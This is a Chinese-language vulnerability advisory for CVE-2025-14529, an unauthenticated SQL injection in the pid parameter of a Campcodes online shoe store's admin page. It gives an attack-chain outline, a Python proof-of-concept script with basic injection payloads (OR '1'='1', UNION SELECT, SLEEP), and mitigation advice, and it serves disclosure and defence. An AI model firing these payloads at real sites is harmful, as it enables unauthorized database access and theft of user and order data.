CVE-2025-14529 Campcodes Retro Basketball Shoes Online Store 1.0 SQL注入漏洞

漏洞信息

漏洞编号

CVE-2025-14529

漏洞类型

SQL注入

CVSS评分

7.3 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Campcodes Retro Basketball Shoes Online Store 1.0

漏洞概述

CVE-2025-14529是Campcodes公司开发的Retro Basketball Shoes Online Store 1.0版本中存在的一个高危SQL注入漏洞。该漏洞位于管理后台的/admin/admin_running.php文件中，对pid参数未进行充分的输入过滤和SQL语句预编译，导致攻击者可以通过构造恶意SQL语句实现数据库注入攻击。由于该漏洞攻击向量为网络远程攻击，且无需认证和用户交互，攻击者可利用公开的漏洞利用代码（PoC）直接对目标系统发起攻击，窃取数据库中的敏感信息，包括用户凭据、订单数据、商品信息等。该漏洞CVSS评分为7.3，属于高危级别，对互联网公开部署的系统构成严重安全威胁。

技术细节

该SQL注入漏洞存在于/admin/admin_running.php文件中的某个未知函数处理逻辑中，具体问题出在对pid参数的处理上。攻击者可以通过HTTP请求向该文件传递经过精心构造的pid参数值，利用SQL语法特性进行注入攻击。由于应用程序未对用户输入进行严格的参数化查询或输入验证，恶意SQL代码会被数据库服务器执行。典型的利用方式包括：1）通过UNION SELECT语句提取数据库版本、用户名、数据库名等敏感信息；2）使用布尔型盲注（Boolean-based blind）或时间型盲注（Time-based blind）技术逐字符猜测数据；3）通过OUTFILE等语句尝试写入恶意文件。由于该漏洞无需认证即可访问受影响的管理端点，攻击门槛较低，危害性较大。建议立即对该参数进行输入过滤，并使用参数化查询（Prepared Statements）重构相关代码。

攻击链分析

STEP 1

步骤1

信息收集：攻击者识别目标站点使用Campcodes Retro Basketball Shoes Online Store 1.0系统

STEP 2

步骤2

访问管理后台：访问/admin/admin_running.php文件

STEP 3

步骤3

构造恶意请求：构造包含SQL注入载荷的pid参数，如使用UNION SELECT或盲注技术

STEP 4

步骤4

执行注入攻击：发送恶意请求，触发SQL注入漏洞执行注入代码

STEP 5

步骤5

数据提取：利用注入点提取数据库中的敏感信息（用户数据、订单信息等）

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-14529 SQL Injection PoC
# Target: Campcodes Retro Basketball Shoes Online Store 1.0
# Endpoint: /admin/admin_running.php?pid=<inject>

import requests
import sys

target = "http://target.com/admin/admin_running.php"

# Basic SQL Injection test payloads
payloads = [
    "1' OR '1'='1",
    "1' UNION SELECT 1,2,3,4,5-- -",
    "1' AND SLEEP(5)-- -",
    "1' ORDER BY 10-- -"
]

def test_sqli(payload):
    params = {"pid": payload}
    try:
        response = requests.get(target, params=params, timeout=10)
        print(f"[*] Testing payload: {payload}")
        print(f"[*] Status: {response.status_code}")
        print(f"[*] Response length: {len(response.text)}")
    except requests.exceptions.RequestException as e:
        print(f"[!] Error: {e}")

if __name__ == "__main__":
    print("CVE-2025-14529 SQL Injection PoC")
    print("=" * 50)
    for payload in payloads:
        test_sqli(payload)

影响范围

Campcodes Retro Basketball Shoes Online Store 1.0

防御指南

临时缓解措施

立即限制/admin/admin_running.php的访问权限，仅允许受信任的IP地址访问；临时使用Web应用防火墙规则阻止包含SQL注入特征的请求；建议开发团队使用参数化查询重构所有数据库操作代码，并对用户输入进行严格的过滤和验证。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-14529
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-14529
3 Details https://www.cvedetails.com/cve/CVE-2025-14529/
4 VulDB https://vuldb.com/cve/CVE-2025-14529
5 Link https://github.com/Rowantu/CVE/issues/7
6 Link https://vuldb.com/?ctiid.335870
7 Link https://vuldb.com/?id.335870
8 Link https://vuldb.com/?submit.703191
9 Link https://www.campcodes.com/
10 Link https://github.com/Rowantu/CVE/issues/7